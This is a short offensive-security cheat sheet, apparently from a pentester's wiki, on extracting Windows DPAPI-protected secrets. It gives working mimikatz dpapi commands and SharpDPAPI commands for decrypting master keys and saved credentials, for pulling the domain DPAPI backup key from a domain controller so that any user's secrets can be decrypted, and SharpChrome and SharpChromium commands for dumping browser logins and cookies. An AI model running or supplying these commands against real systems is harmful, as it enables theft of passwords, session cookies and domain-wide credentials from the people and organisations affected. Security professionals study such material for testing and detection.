DPAPI
Data Protection API
ZN17 - Hunting for Credentials Dumping in Windows Environment (Teymur Kheirkhabarov).pdf
8MB
PDF
Master keys locations (hidden files, need
-Force
):PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Protect\ (%appdata%\Microsoft\Protect\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Protect\ (%localappdata%\Microsoft\Protect\)
Credential files locations (hidden files, need
-Force
):PS > ls -fo C:\Users\snovvcrash\AppData\Roaming\Microsoft\Credentials\ (%appdata%\Microsoft\Credentials\)
PS > ls -fo C:\Users\snovvcrash\AppData\Local\Microsoft\Credentials\ (%localappdata%\Microsoft\Credentials\)
Unhide files:
PS > cmd /c "attrib -h -s 00ff00ff-00ff-00ff-00ff-00ff00ff00ff
PS > cmd /c "attrib -h -s 00ff00ff00ff00ff00ff00ff00ff00ff"
Decrypt manually offline with known plaintext password:
mimikatz # dpapi::masterkey /in:00ff00ff-00ff-00ff-00ff-00ff00ff00ff /sid:S-1-5-21-4124311166-4116374192-336467615-500 /password:Passw0rd!
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:00ff00ff00ff00ff00ff00ff00ff00ff
Triage user's credentials, vaults, rdg and certificates:
PS > .\SharpDPAPI.exe triage /password:Passw0rd!
Triage machine's credentials (machinecredentials), vaults (machinevaults) and certificates (certificates /machine):
PS > .\SharpDPAPI.exe machinetriage
Retrieve the domain DPAPI backup key (never changes) from a DC and decrypt master key blobs for any user in the domain with it (needs DA privileges):
PS > .\SharpDPAPI.exe backupkey /nowrap [/server:DC01.megacorp.local] [/file:key.pvk]
PS > .\SharpDPAPI.exe credentials /pvk:key.pvk [/server:PC01.megacorp.local]
PS > .\SharpChrome.exe logins|cookies [/pvk:key.pvk]
PS > ls "C:\Users\snovvcrash\AppData\Local\Google\Chrome\User Data\Default"
PS > .\SharpChromium.exe logins
PS > .\SharpChromium.exe cookies
Last modified 2mo ago